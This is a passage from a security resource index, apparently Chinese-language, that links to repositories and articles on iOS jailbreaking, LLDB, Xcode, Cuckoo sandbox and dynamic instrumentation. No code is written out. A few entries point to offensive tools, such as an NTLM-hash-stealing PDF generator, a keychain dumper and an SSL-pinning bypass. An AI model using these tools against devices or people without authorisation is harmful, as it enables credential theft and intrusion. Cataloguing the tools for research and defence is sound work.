- [**237**星][11m] [C] [geosn0w/osirisjailbreak12](https://github.com/geosn0w/osirisjailbreak12) iOS 12.0 -> 12.1.2 Incomplete Osiris Jailbreak with CVE-2019-6225 by GeoSn0w (FCE365)
### <a id="cbb847a025d426a412c7cd5d8a2332b5"></a>文章
- 2019.10 [talosintelligence] [Checkrain fake iOS jailbreak leads to click fraud](https://blog.talosintelligence.com/2019/10/checkrain-click-fraud.html)
- 2019.08 [elcomsoft] [Why iOS 12.4 Jailbreak Is a Big Deal for the Law Enforcement](https://blog.elcomsoft.com/2019/08/why-ios-12-4-jailbreak-is-a-big-deal-for-the-law-enforcement/)
- 2019.05 [elcomsoft] [Step by Step Guide to iOS Jailbreaking and Physical Acquisition](https://blog.elcomsoft.com/2019/05/step-by-step-guide-to-ios-jailbreaking-and-physical-acquisition/)
- 2019.02 [securityinnovation] [iOS 12 Jailbreak](https://blog.securityinnovation.com/jailbreak)
- 2019.02 [elcomsoft] [iOS 12 Rootless Jailbreak](https://blog.elcomsoft.com/2019/02/ios-12-rootless-jailbreak/)
- 2019.01 [] [IPC Voucher UaF Remote Jailbreak Stage 2](http://blogs.360.cn/post/IPC%20Voucher%20UaF%20Remote%20Jailbreak%20Stage%202.html)
- 2019.01 [] [IPC Voucher UaF Remote Jailbreak Stage 2 (EN)](http://blogs.360.cn/post/IPC%20Voucher%20UaF%20Remote%20Jailbreak%20Stage%202%20(EN).html)
- 2018.07 [elcomsoft] [Using iOS 11.2-11.3.1 Electra Jailbreak for iPhone Physical Acquisition](https://blog.elcomsoft.com/2018/07/electra-jailbreak-ios-11-2-11-3-1-iphone-physical-acquisition/)
- 2017.12 [venus] [GreatiOSJailbreakMaterial - Only List the Most Useful Materials Here!](https://paper.seebug.org/482/)
- 2015.10 [welivesecurity] [New YiSpecter malware attacks iOS devices without jailbreak](https://www.welivesecurity.com/2015/10/06/new-yispecter-malware-attacks-ios-devices-without-jailbreak/)
- 2011.07 [sans] [Jailbreakme Takes Advantage of 0-day PDF Vuln in Apple iOS Devices](https://isc.sans.edu/forums/diary/Jailbreakme+Takes+Advantage+of+0day+PDF+Vuln+in+Apple+iOS+Devices/11185/)
- 2010.09 [securelist] [iPhone Jailbreaking, Greenpois0n and SHAtter Trojans](https://securelist.com/iphone-jailbreaking-greenpois0n-and-shatter-trojans/29748/)
- 2010.08 [trendmicro] [The Security Implications of iOS Jailbreaking](https://blog.trendmicro.com/trendlabs-security-intelligence/the-security-implications-of-ios-jailbreaking/)
- 2010.08 [trendmicro] [Online iPhone Jailbreak Uses iOS Vulnerabilities](https://blog.trendmicro.com/trendlabs-security-intelligence/online-iphone-jailbreak-uses-ios-vulnerabilities/)
***
## <a id="004d0b9e325af207df8e1ca61af7b721"></a>LLDB
### <a id="c20772abc204dfe23f3e946f8c73dfda"></a>工具
- [**8031**星][3m] [Py] [facebook/chisel](https://github.com/facebook/chisel) Chisel is a collection of LLDB commands to assist debugging iOS apps.
- [**784**星][3m] [C++] [nodejs/llnode](https://github.com/nodejs/llnode) An lldb plugin for Node.js and V8, which enables inspection of JavaScript states for insights into Node.js processes and their core dumps.
- [**636**星][2m] [C++] [apple/swift-lldb](https://github.com/apple/swift-lldb) This is the version of LLDB that supports the Swift programming language & REPL.
- [**492**星][28d] [Rust] [vadimcn/vscode-lldb](https://github.com/vadimcn/vscode-lldb) A native debugger extension for VSCode based on LLDB
- [**388**星][2m] [C++] [llvm-mirror/lldb](https://github.com/llvm-mirror/lldb) Mirror of official lldb git repository located at
### <a id="86eca88f321a86712cc0a66df5d72e56"></a>文章
- 2019.11 [4hou] [一款实用的macOS内核调试工具——LLDBagility](https://www.4hou.com/tools/21472.html)
- 2019.11 [reverse] [How to make LLDB a real debugger](https://reverse.put.as/2019/11/19/how-to-make-lldb-a-real-debugger/)
- 2019.08 [trendmicro] [LLDBFuzzer: Debugging and Fuzzing the Apple Kernel with LLDB Script](https://blog.trendmicro.com/trendlabs-security-intelligence/lldbfuzzer-debugging-and-fuzzing-the-apple-kernel-with-lldb-script/)
- 2019.06 [quarkslab] [LLDBagility: practical macOS kernel debugging](https://blog.quarkslab.com/lldbagility-practical-macos-kernel-debugging.html)
- 2018.05 [freebuf] [如何在Electra越狱的设备上使用LLDB调试应用程序](http://www.freebuf.com/articles/terminal/173218.html)
- 2018.01 [reverse] [lldbinit - Improving LLDB](https://reverse.put.as/2018/01/15/lldbinit-improving-lldb/)
- 2017.10 [venus] [Native LLDB(v3.8) for iOS](https://paper.seebug.org/419/)
- 2017.10 [pediy] [[原创]4s的9.3.5尝试Proteas大神的Native lldb](https://bbs.pediy.com/thread-221926.htm)
- 2017.07 [pediy] [[分享]]编译mac下的lldb](https://bbs.pediy.com/thread-219717.htm)
- 2016.09 [pediy] [[原创]lldb使用方法(学习笔记)](https://bbs.pediy.com/thread-212731.htm)
- 2015.01 [pediy] [[原创]修正lldb-310及以后版本的Thumb反汇编问题](https://bbs.pediy.com/thread-196735.htm)
- 2014.08 [3xp10it] [lldb命令](http://3xp10it.cc/%E4%BA%8C%E8%BF%9B%E5%88%B6/2017/12/25/lldb%E5%91%BD%E4%BB%A4/)
- 2014.08 [3xp10it] [lldb命令](http://3xp10it.cc/%E4%BA%8C%E8%BF%9B%E5%88%B6/2017/12/25/lldb%E5%91%BD%E4%BB%A4/)
- 2014.05 [pediy] [[原创]gikdbg v1.1携手lldb震撼来袭,求内测伙伴!](https://bbs.pediy.com/thread-187657.htm)
- 2013.03 [it] [iTunes debugging disabling ptrace with LLDB](https://blog.it-securityguard.com/itunes-exploit-development/)
- 2005.08 [pediy] [[原创]借第一篇破文吹一下olldbg](https://bbs.pediy.com/thread-16177.htm)
- 2004.06 [pediy] [用olldbg破解,分析ocx控件](https://bbs.pediy.com/thread-2134.htm)
***
## <a id="977cef2fc942ac125fa395254ab70eea"></a>XCode
### <a id="7037d96c1017978276cb920f65be2297"></a>工具
- [**6203**星][3m] [ObjC] [johnno1962/injectionforxcode](https://github.com/johnno1962/injectionforxcode) Runtime Code Injection for Objective-C & Swift
- [**2057**星][19d] [ObjC] [ios-control/ios-deploy](https://github.com/ios-control/ios-deploy) Install and debug iPhone apps from the command line, without using Xcode
- [**1606**星][2m] [Swift] [indragiek/inappviewdebugger](https://github.com/indragiek/inappviewdebugger) A UIView debugger (like Reveal or Xcode) that can be embedded in an app for on-device view debugging
- [**1409**星][1m] [Swift] [johnno1962/injectioniii](https://github.com/johnno1962/injectioniii) Re-write of Injection for Xcode in (mostly) Swift4
- [**572**星][1m] [ObjC] [hdb-li/lldebugtool](https://github.com/hdb-li/lldebugtool) LLDebugTool is a debugging tool for developers and testers that can help you analyze and manipulate data in non-xcode situations.
- [**384**星][3m] [JS] [johnno1962/xprobeplugin](https://github.com/johnno1962/xprobeplugin) Live Memory Browser for Apps & Xcode
### <a id="a2d228a68b40162953d3d482ce009d4e"></a>文章
- 2019.07 [pewpewthespells] [Using Xcode Targets](https://pewpewthespells.com/blog/using_xcode_targets.pdf)
- 2019.07 [pewpewthespells] [Xcode Build Locations](https://pewpewthespells.com/blog/xcode_build_locations.pdf)
- 2019.07 [pewpewthespells] [Migrating Code Signing Configurations to Xcode 8](https://pewpewthespells.com/blog/migrating_code_signing.pdf)
- 2019.06 [pewpewthespells] [Xcode SDKs](https://pewpewthespells.com/blog/sparse_sdks.pdf)
- 2019.04 [pewpewthespells] [Xcode Build Settings Reference](https://pewpewthespells.com/blog/buildsettings.pdf)
- 2019.03 [pewpewthespells] [Xcode DerivedData Hashes](https://pewpewthespells.com/blog/xcode_deriveddata_hashes.pdf)
- 2019.02 [pewpewthespells] [The Xcode Build System](https://pewpewthespells.com/blog/xcode_build_system.pdf)
- 2019.02 [pewpewthespells] [Managing Xcode](https://pewpewthespells.com/blog/managing_xcode.pdf)
- 2019.02 [hakin9] [Building an iOS App Without Xcode’s Build System by Vojta Stavik](https://hakin9.org/building-an-ios-app-without-xcodes-build-system/)
- 2018.11 [CodeColorist] [Xcode Instruments for iOS: reversing and abuse](https://medium.com/p/dd73d72d87e2)
- 2018.06 [applehelpwriter] [Xcode 10: where did snippets go?](https://applehelpwriter.com/2018/06/10/xcode-10-where-did-snippets-go/)
- 2018.05 [freecodecamp] [How to convert your Xcode plugins to Xcode extensions](https://medium.com/p/ac90f32ae0e3)
- 2017.07 [pediy] [[原创] iOSOpenDev修改版MonkeyDev,最新theos和Xcode 9测试通过!](https://bbs.pediy.com/thread-219003.htm)
- 2017.06 [alonemonkey] [0x01 Xcode调试一个LLVM Pass](http://www.alonemonkey.com/2017/06/02/writing-an-llvm-pass/)
- 2017.03 [360] [XcodeGhost或重出江湖,Google Play大量APP被植入恶意代码](https://www.anquanke.com/post/id/85636/)
- 2016.05 [rachelbythebay] [Go upgrade Xcode. Fix your git security hole.](http://rachelbythebay.com/w/2016/05/05/xcode/)
- 2015.12 [metricpanda] [Compiling NASM Assembly with Xcode in a C/C++ Project](https://metricpanda.com/compiling-nasm-with-xcode-in-a-cpp-project)
- 2015.12 [360] [Xcode 7 Bitcode的工作流程及安全性评估](https://www.anquanke.com/post/id/83125/)
- 2015.12 [freebuf] [Xcode 7 Bitcode的工作流程及安全性评估](http://www.freebuf.com/articles/others-articles/89806.html)
- 2015.11 [freebuf] [XcodeGhost S:变种带来的又一波影响](http://www.freebuf.com/news/84064.html)
***
## <a id="58cd9084afafd3cd293564c1d615dd7f"></a>工具
### <a id="d0108e91e6863289f89084ff09df39d0"></a>新添加的
- [**10966**星][10d] [ObjC] [flipboard/flex](https://github.com/flipboard/flex) An in-app debugging and exploration tool for iOS
- [**5775**星][4m] [ObjC] [square/ponydebugger](https://github.com/square/ponydebugger) Remote network and data debugging for your native iOS app using Chrome Developer Tools
- [**4663**星][1m] [C] [google/ios-webkit-debug-proxy](https://github.com/google/ios-webkit-debug-proxy) A DevTools proxy (Chrome Remote Debugging Protocol) for iOS devices (Safari Remote Web Inspector).
- [**4397**星][12d] [Swift] [signalapp/signal-ios](https://github.com/signalapp/Signal-iOS) A private messenger for iOS.
- [**3686**星][4m] [C] [facebook/fishhook](https://github.com/facebook/fishhook) A library that enables dynamically rebinding symbols in Mach-O binaries running on iOS.
- [**3414**星][2m] [icodesign/potatso](https://github.com/icodesign/Potatso) Potatso is an iOS client that implements different proxies with the leverage of NetworkExtension framework in iOS 10+.
- [**3327**星][3m] [Swift] [yagiz/bagel](https://github.com/yagiz/bagel) a little native network debugging tool for iOS
- [**3071**星][10m] [JS] [jipegit/osxauditor](https://github.com/jipegit/osxauditor) OS X Auditor is a free Mac OS X computer forensics tool
- [**2867**星][12d] [ObjC] [facebook/idb](https://github.com/facebook/idb) idb is a flexible command line interface for automating iOS simulators and devices
- [**2795**星][24d] [Swift] [kasketis/netfox](https://github.com/kasketis/netfox) A lightweight, one line setup, iOS / OSX network debugging library!
- [**2753**星][1m] [Makefile] [theos/theos](https://github.com/theos/theos) A cross-platform suite of tools for building and deploying software for iOS and other platforms.
- [**2733**星][26d] [ObjC] [dantheman827/ios-app-signer](https://github.com/dantheman827/ios-app-signer) This is an app for OS X that can (re)sign apps and bundle them into ipa files that are ready to be installed on an iOS device.
- [**2708**星][2m] [ObjC] [kjcracks/clutch](https://github.com/kjcracks/clutch) Fast iOS executable dumper
- [**1801**星][1y] [aozhimin/ios-monitor-platform](https://github.com/aozhimin/ios-monitor-platform)
- [**1695**星][6m] [Py] [yelp/osxcollector](https://github.com/yelp/osxcollector) A forensic evidence collection & analysis toolkit for OS X
- [**1683**星][2m] [Swift] [pmusolino/wormholy](https://github.com/pmusolino/wormholy) iOS network debugging, like a wizard 🧙♂️
- [**1642**星][7m] [Objective-C++] [tencent/oomdetector](https://github.com/tencent/oomdetector) OOMDetector is a memory monitoring component for iOS which provides you with OOM monitoring, memory allocation monitoring, memory leak detection and other functions.
- [**1630**星][1m] [ivrodriguezca/re-ios-apps](https://github.com/ivrodriguezca/re-ios-apps) A completely free, open source and online course about Reverse Engineering iOS Applications.
- [**1442**星][28d] [ObjC] [nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2) Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and OS X Apps
- [**1299**星][6m] [JS] [feross/spoof](https://github.com/feross/spoof) Easily spoof your MAC address in macOS, Windows, & Linux!
- [**1291**星][1m] [JS] [icymind/vrouter](https://github.com/icymind/vrouter) 一个基于 VirtualBox 和 openwrt 构建的项目, 旨在实现 macOS / Windows 平台的透明代理.
- [**1253**星][2m] [Vue] [chaitin/passionfruit](https://github.com/chaitin/passionfruit) iOSapp 黑盒评估工具。功能丰富,自带基于web的 GUI
- [**1252**星][17d] [michalmalik/osx-re-101](https://github.com/michalmalik/osx-re-101) OSX/iOS逆向资源收集
- [**1239**星][8d] [C] [datatheorem/trustkit](https://github.com/datatheorem/trustkit) Easy SSL pinning validation and reporting for iOS, macOS, tvOS and watchOS.
- [**1215**星][16d] [YARA] [horsicq/detect-it-easy](https://github.com/horsicq/detect-it-easy) Program for determining types of files for Windows, Linux and MacOS.
- [**1113**星][1y] [ObjC] [neoneggplant/eggshell](https://github.com/neoneggplant/eggshell) iOS/macOS/Linux Remote Administration Tool
- [**1001**星][2m] [ObjC] [lmirosevic/gbdeviceinfo](https://github.com/lmirosevic/gbdeviceinfo) Detects the hardware, software and display of the current iOS or Mac OS X device at runtime.
- [**907**星][4m] [ObjC] [ptoomey3/keychain-dumper](https://github.com/ptoomey3/keychain-dumper) A tool to check which keychain items are available to an attacker once an iOS device has been jailbroken
- [**866**星][16d] [ObjC] [meitu/mthawkeye](https://github.com/meitu/mthawkeye) Profiling / Debugging assist tools for iOS. (Memory Leak, OOM, ANR, Hard Stalling, Network, OpenGL, Time Profile ...)
- [**840**星][9d] [JS] [cypress-io/cypress-example-recipes](https://github.com/cypress-io/cypress-example-recipes) Various recipes for testing common scenarios with Cypress
- [**796**星][13d] [Shell] [aqzt/kjyw](https://github.com/aqzt/kjyw) 快捷运维,代号kjyw,项目基于shell、python,运维脚本工具库,收集各类运维常用工具脚本,实现快速安装nginx、mysql、php、redis、nagios、运维经常使用的脚本等等...
- [**662**星][1y] [Py] [deepzec/bad-pdf](https://github.com/deepzec/bad-pdf) create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines
- [**651**星][9m] [ObjC] [chenxiancai/stcobfuscator](https://github.com/chenxiancai/stcobfuscator) iOS全局自动化 代码混淆 工具!支持cocoapod组件代码一并 混淆,完美避开hardcode方法、静态库方法和系统库方法!
- [**604**星][2m] [siguza/ios-resources](https://github.com/siguza/ios-resources) Useful resources for iOS hacking
- [**500**星][27d] [Swift] [google/science-journal-ios](https://github.com/google/science-journal-ios) Use the sensors in your mobile devices to perform science experiments. Science doesn’t just happen in the classroom or lab—tools like Science Journal let you see how the world works with just your phone.
- [**482**星][1y] [Swift] [icepa/icepa](https://github.com/icepa/icepa) iOS system-wide VPN based Tor client
- [**478**星][15d] [pixelcyber/thor](https://github.com/pixelcyber/thor) HTTP Sniffer/Capture on iOS for Network Debug & Inspect.
- [**471**星][8m] [C++] [everettjf/machoexplorer](https://github.com/everettjf/machoexplorer) MachO文件查看器,支持Windows和macOS
- [**462**星][15d] [Java] [dsheirer/sdrtrunk](https://github.com/dsheirer/sdrtrunk) A cross-platform java application for decoding, monitoring, recording and streaming trunked mobile and related radio protocols using Software Defined Radios (SDR). Website:
- [**430**星][11m] [captainarash/the_holy_book_of_x86](https://github.com/captainarash/the_holy_book_of_x86) A simple guide to x86 architecture, assembly, memory management, paging, segmentation, SMM, BIOS....
- [**396**星][4m] [ansjdnakjdnajkd/ios](https://github.com/ansjdnakjdnajkd/ios) iOS渗透测试最有用的工具
- [**382**星][11m] [C] [coolstar/electra1131](https://github.com/coolstar/electra1131) electra1131: Electra for iOS 11.0 - 11.3.1
- [**375**星][29d] [Swift] [justeat/justlog](https://github.com/justeat/justlog) JustLog brings logging on iOS to the next level. It supports console, file and remote Logstash logging via TCP socket with no effort. Support for logz.io available.
- [**371**星][18d] [Shell] [matthewpierson/1033-ota-downgrader](https://github.com/matthewpierson/1033-ota-downgrader) First ever tool to downgrade ANY iPhone 5s, ANY iPad Air and (almost any) iPad Mini 2 to 10.3.3 with OTA blobs + checkm8!
- [**349**星][19d] [C] [jedisct1/swift-sodium](https://github.com/jedisct1/swift-sodium) Safe and easy to use crypto for iOS and macOS
- [**346**星][4m] [TS] [bacher09/pwgen-for-bios](https://github.com/bacher09/pwgen-for-bios) Password generator for BIOS
- [**340**星][3m] [C] [trailofbits/cb-multios](https://github.com/trailofbits/cb-multios) DARPA Challenges Sets for Linux, Windows, and macOS
- [**322**星][2m] [ObjC] [auth0/simplekeychain](https://github.com/auth0/simplekeychain) A Keychain helper for iOS to make it very simple to store/obtain values from iOS Keychain
- [**310**星][28d] [Swift] [securing/iossecuritysuite](https://github.com/securing/iossecuritysuite) iOS platform security & anti-tampering Swift library
- [**263**星][14d] [ObjC] [strongbox-password-safe/strongbox](https://github.com/strongbox-password-safe/strongbox) A KeePass/Password Safe Client for iOS and OS X
- [**247**星][1m] [C++] [s0uthwest/futurerestore](https://github.com/s0uthwest/futurerestore) iOS upgrade and downgrade tool utilizing SHSH blobs
- [**244**星][7m] [JS] [we11cheng/wcshadowrocket](https://github.com/we11cheng/wcshadowrocket) iOS Shadowrocket(砸壳重签,仅供参考,添加节点存在问题)。另一个fq项目potatso源码参见:
- [**239**星][1y] [ObjC] [lmirosevic/gbping](https://github.com/lmirosevic/gbping) Highly accurate ICMP Ping controller for iOS
- [**238**星][4m] [Swift] [shadowsocksr-live/ishadowsocksr](https://github.com/shadowsocksr-live/ishadowsocksr) ShadowsocksR for iOS, come from
- [**223**星][12m] [AppleScript] [lifepillar/csvkeychain](https://github.com/lifepillar/csvkeychain) Import/export between Apple Keychain.app and plain CSV file.
- [**219**星][6m] [ObjC] [rickyzhang82/tethering](https://github.com/rickyzhang82/tethering) Proxy and DNS Server on iOS
- [**213**星][8m] [C] [owasp/igoat](https://github.com/owasp/igoat) OWASP iGoat - A Learning Tool for iOS App Pentesting and Security by Swaroop Yermalkar
- [**211**星][13d] [TS] [bevry/getmac](https://github.com/bevry/getmac) Get the mac address of the current machine you are on via Node.js
- [**203**星][5m] [Py] [googleprojectzero/ios-messaging-tools](https://github.com/googleprojectzero/ios-messaging-tools) several tools Project Zero uses to test iPhone messaging
- [**200**星][6m] [PS] [mkellerman/invoke-commandas](https://github.com/mkellerman/invoke-commandas) Invoke Command As System/Interactive/GMSA/User on Local/Remote machine & returns PSObjects.
***
## <a id="c97bbe32bbd26c72ceccb43400e15bf1"></a>文章&&视频
### <a id="d4425fc7c360c2ff324be718cf3b7a78"></a>新添加
# <a id="0ae4ddb81ff126789a7e08b0768bd693"></a>Cuckoo
***
## <a id="5830a8f8fb3af1a336053d84dd7330a1"></a>工具
### <a id="f2b5c44c2107db2cec6c60477c6aa1d0"></a>新添加的
- [**4042**星][3m] [JS] [cuckoosandbox/cuckoo](https://github.com/cuckoosandbox/cuckoo) Cuckoo Sandbox is an automated dynamic malware analysis system
- [**308**星][2m] [Py] [hatching/vmcloak](https://github.com/hatching/vmcloak) Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox.
- [**238**星][7m] [Py] [cuckoosandbox/community](https://github.com/cuckoosandbox/community) Repository of modules and signatures contributed by the community
- [**236**星][4m] [Py] [brad-sp/cuckoo-modified](https://github.com/brad-sp/cuckoo-modified) Modified edition of cuckoo
- [**225**星][1y] [PHP] [cuckoosandbox/monitor](https://github.com/cuckoosandbox/monitor) The new Cuckoo Monitor.
- [**220**星][4m] [Shell] [blacktop/docker-cuckoo](https://github.com/blacktop/docker-cuckoo) Cuckoo Sandbox Dockerfile
***
## <a id="ec0a441206d9a2fe1625dce0a679d466"></a>文章&&视频
- 2019.04 [eforensicsmag] [How to Integrate RSA Malware Analysis with Cuckoo Sandbox | By Luiz Henrique Borges](https://eforensicsmag.com/how-to-integrate-rsa-malware-analysis-with-cuckoo-sandbox-by-luiz-henrique-borges/)
- 2019.02 [thehive] [Cortex-Analyzers 1.15.3 get ready for URLhaus and Cuckoo](https://blog.thehive-project.org/2019/02/26/cortex-analyzers-1-15-3-get-ready-for-urlhaus-and-cuckoo/)
- 2018.07 [360] [一例IRC Bot针对Cuckoo沙箱的猥琐对抗分析](https://www.anquanke.com/post/id/152631/)
- 2018.05 [trustedsec] [Malware Analysis is for the (Cuckoo) Birds – Working with Proxmox](https://www.trustedsec.com/2018/05/working-with-proxmox/)
- 2018.05 [trustedsec] [Protected: Malware Analysis is for the (Cuckoo) Birds](https://www.trustedsec.com/2018/05/malware-cuckoo-1/)
- 2018.05 [trustedsec] [Protected: Malware Analysis is for the (Cuckoo) Birds – Cuckoo Installation Notes for Debian](https://www.trustedsec.com/2018/05/malware-cuckoo-2/)
- 2018.04 [ly0n] [Automating malware analysis, cuckoo api + postfix](https://paumunoz.tech/2018/04/25/automating-malware-analysis-cuckoo-api-postfix/)
- 2018.04 [ly0n] [Automating malware analysis, cuckoo api + postfix](http://ly0n.me/2018/04/25/automating-malware-analysis-cuckoo-api-postfix/)
- 2018.04 [nviso] [Painless Cuckoo Sandbox Installation](https://blog.nviso.be/2018/04/12/painless-cuckoo-sandbox-installation/)
- 2018.03 [rapid7] [Next Threat Intel Book Club 4/5: Recapping The Cuckoo’s Egg](https://blog.rapid7.com/2018/03/18/next-threat-intel-book-club-4-5-recapping-the-cuckoos-egg/)
- 2018.03 [ensurtec] [Cuckoo Sandbox Setup Tutorial](https://ensurtec.com/cuckoo-sandbox-setup-tutorial/)
- 2018.01 [fortinet] [Prevalent Threats Targeting Cuckoo Sandbox Detection and Our Mitigation](https://blog.fortinet.com/2018/01/03/prevalent-threats-targeting-cuckoo-sandbox-detection-and-our-mitigation)
- 2018.01 [fortinet] [Prevalent Threats Targeting Cuckoo Sandbox Detection and Our Mitigation](https://www.fortinet.com/blog/threat-research/prevalent-threats-targeting-cuckoo-sandbox-detection-and-our-mitigation.html)
- 2017.09 [360] [在细节中捕捉恶魔 :提升Cuckoo沙箱捕获恶意Office样本行为的能力](https://www.anquanke.com/post/id/86826/)
- 2017.08 [trustwave] [Cuckoo & Linux Subsystem: Some Love for Windows 10](https://www.trustwave.com/Resources/SpiderLabs-Blog/Cuckoo--Linux-Subsystem--Some-Love-for-Windows-10/)
- 2017.08 [n0where] [Automated Android Malware Analysis: CuckooDroid](https://n0where.net/automated-android-malware-analysis-cuckoodroid)
- 2017.05 [robertputt] [Basic Malware Analysis with Cuckoo Sandbox](http://robertputt.co.uk/basic-malware-analysis-with-cuckoo-sandbox.html)
- 2017.05 [rastamouse] [Playing with Cuckoo](https://rastamouse.me/2017/05/playing-with-cuckoo/)
- 2017.04 [mcafee] [OpenDXL Case Study: Sandbox Mania featuring Cuckoo and Wildfire](https://securingtomorrow.mcafee.com/business/optimize-operations/opendxl-case-study-sandbox-mania-featuring-cuckoo-wildfire/)
- 2016.11 [tribalchicken] [Guide: Cuckoo Sandbox on FreeBSD](https://tribalchicken.io/guide-cuckoo-sandbox-on-freebsd/)
# <a id="7ab3a7005d6aa699562b3a0a0c6f2cff"></a>DBI
***
## <a id="c8cdb0e30f24e9b7394fcd5681f2e419"></a>DynamoRIO
### <a id="6c4841dd91cb173093ea2c8d0b557e71"></a>工具
#### <a id="3a577a5b4730a1b5b3b325269509bb0a"></a>DynamoRIO
- [**1388**星][12d] [C] [dynamorio/drmemory](https://github.com/dynamorio/drmemory) Memory Debugger for Windows, Linux, Mac, and Android
- [**1228**星][12d] [C] [dynamorio/dynamorio](https://github.com/dynamorio/dynamorio) Dynamic Instrumentation Tool Platform
#### <a id="ff0abe26a37095f6575195950e0b7f94"></a>新添加的
- [**1364**星][3m] [C] [googleprojectzero/winafl](https://github.com/googleprojectzero/winafl) A fork of AFL for fuzzing Windows binaries
- [**249**星][5m] [C] [ampotos/dynstruct](https://github.com/ampotos/dynstruct) Reverse engineering tool for automatic structure recovering and memory use analysis based on DynamoRIO and Capstone
#### <a id="928642a55eff34b6b52622c6862addd2"></a>与其他工具交互
### <a id="9479ce9f475e4b9faa4497924a2e40fc"></a>文章&&视频
- 2019.10 [freebuf] [DrSemu:基于动态行为的恶意软件检测与分类工具](https://www.freebuf.com/sectool/214277.html)
- 2019.06 [freebuf] [Functrace:使用DynamoRIO追踪函数调用](https://www.freebuf.com/sectool/205989.html)
- 2019.01 [360] [深入浅出——基于DynamoRIO的strace和ltrace](https://www.anquanke.com/post/id/169257/)
- 2018.08 [n0where] [Dynamic API Call Tracer for Windows and Linux Applications: Drltrace](https://n0where.net/dynamic-api-call-tracer-for-windows-and-linux-applications-drltrace)
- 2018.07 [topsec] [动态二进制修改(Dynamic Binary Instrumentation)入门:Pin、DynamoRIO、Frida](http://blog.topsec.com.cn/%e5%8a%a8%e6%80%81%e4%ba%8c%e8%bf%9b%e5%88%b6%e4%bf%ae%e6%94%b9dynamic-binary-instrumentation%e5%85%a5%e9%97%a8%ef%bc%9apin%e3%80%81dynamorio%e3%80%81frida/)
- 2017.11 [SECConsult] [The Art of Fuzzing - Demo 10: In-memory Fuzzing HashCalc using DynamoRio](https://www.youtube.com/watch?v=FEJGlgBeUJ8)
- 2017.11 [SECConsult] [The Art of Fuzzing - Demo 6: Extract Coverage Information using DynamoRio](https://www.youtube.com/watch?v=Ur_E9c2vX1A)
- 2017.04 [pediy] [[原创]通过Selife学习使用DynamoRIO动态插桩](https://bbs.pediy.com/thread-216970.htm)
- 2016.11 [360] [“Selfie”:利用DynamoRIO实现自修改代码自动脱壳的神器](https://www.anquanke.com/post/id/84999/)
- 2016.09 [securitygossip] [Practical Memory Checking With Dr. Memory](http://securitygossip.com/blog/2016/09/12/2016-09-12/)
- 2016.09 [sjtu] [Practical Memory Checking With Dr. Memory](https://loccs.sjtu.edu.cn/gossip/blog/2016/09/12/2016-09-12/)
- 2016.08 [n0where] [Dynamic Instrumentation Tool Platform: DynamoRIO](https://n0where.net/dynamic-instrumentation-tool-platform-dynamorio)
- 2014.01 [dustri] [Memory debugging under Windows with drmemory](https://dustri.org/b/memory-debugging-under-windows-with-drmemory.html)
- 2012.10 [redplait] [building dynamorio](http://redplait.blogspot.com/2012/10/building-dynamorio.html)
- 2011.06 [redplait] [dynamorio](http://redplait.blogspot.com/2011/06/dynamorio.html)
***
## <a id="7b8a493ca344f41887792fcc008573e7"></a>IntelPin
### <a id="fe5a6d7f16890542c9e60857706edfde"></a>工具
#### <a id="78a2edf9aa41eb321436cb150ea70a54"></a>新添加的
- [**299**星][2m] [C] [vusec/vuzzer](https://github.com/vusec/vuzzer) depends heavily on a modeified version of DataTracker, which in turn depends on LibDFT pintool.
#### <a id="e6a829abd8bbc5ad2e5885396e3eec04"></a>与其他工具交互
##### <a id="e129288dfadc2ab0890667109f93a76d"></a>未分类
- [**943**星][1y] [Py] [gaasedelen/lighthouse](https://github.com/gaasedelen/lighthouse) 从DBI中收集代码覆盖情况,在IDA/Binja中映射、浏览、查看
- 重复区段: [IDA->插件->调试->DBI数据](#0fbd352f703b507853c610a664f024d1) |[DBI->Frida->工具->与其他工具交互->IDA](#d628ec92c9eea0c4b016831e1f6852b3) |[DBI->Frida->工具->与其他工具交互->BinaryNinja](#f9008a00e2bbc7535c88602aa79c8fd8) |
- [coverage-frida](https://github.com/gaasedelen/lighthouse/blob/master/coverage/frida/README.md) 使用Frida收集信息
- [coverage-pin](https://github.com/gaasedelen/lighthouse/blob/master/coverage/pin/README.md) 使用Pin收集覆盖信息
- [插件](https://github.com/gaasedelen/lighthouse/blob/master/plugin/lighthouse_plugin.py) 支持IDA和BinNinja
### <a id="226190bea6ceb98ee5e2b939a6515fac"></a>文章&&视频
***
## <a id="f24f1235fd45a1aa8d280eff1f03af7e"></a>Frida
### <a id="a5336a0f9e8e55111bda45c8d74924c1"></a>工具
#### <a id="6d3c24e43835420063f9ca50ba805f15"></a>Frida
- [**4516**星][13d] [Makefile] [frida/frida](https://github.com/frida/frida) Clone this repo to build Frida
#### <a id="54836a155de0c15b56f43634cd9cfecf"></a>新添加的
- [**1193**星][15d] [JS] [alonemonkey/frida-ios-dump](https://github.com/alonemonkey/frida-ios-dump) pull decrypted ipa from jailbreak device
- 重复区段: [Apple->越狱->工具](#ff19d5d94315d035bbcb3ef0c348c75b) |
- [**895**星][5m] [JS] [dpnishant/appmon](https://github.com/dpnishant/appmon) 用于监视和篡改本地macOS,iOS和android应用程序的系统API调用的自动化框架。基于Frida。
- [**645**星][16d] [Py] [igio90/dwarf](https://github.com/igio90/dwarf) Full featured multi arch/os debugger built on top of PyQt5 and frida
- [**559**星][1m] [JS] [nccgroup/house](https://github.com/nccgroup/house) 运行时手机 App 分析工具包, 带Web GUI
- [**513**星][1m] [JS] [iddoeldor/frida-snippets](https://github.com/iddoeldor/frida-snippets) Hand-crafted Frida examples
- [**422**星][1y] [Py] [dstmath/frida-unpack](https://github.com/dstmath/frida-unpack) 基于Frida的脱壳工具
- [**420**星][13d] [C] [frida/frida-python](https://github.com/frida/frida-python) Frida Python bindings
- [**332**星][15d] [JS] [chichou/bagbak](https://github.com/ChiChou/bagbak) Yet another frida based iOS dumpdecrypted, works on iOS 13 with checkra1n and supports decrypting app extensions
- [**321**星][1m] [C] [frida/frida-core](https://github.com/frida/frida-core) Frida core library intended for static linking into bindings
- [**308**星][4m] [JS] [smartdone/frida-scripts](https://github.com/smartdone/frida-scripts) 一些frida脚本
- [**283**星][8m] [Py] [nightbringer21/fridump](https://github.com/nightbringer21/fridump) A universal memory dumper using Frida
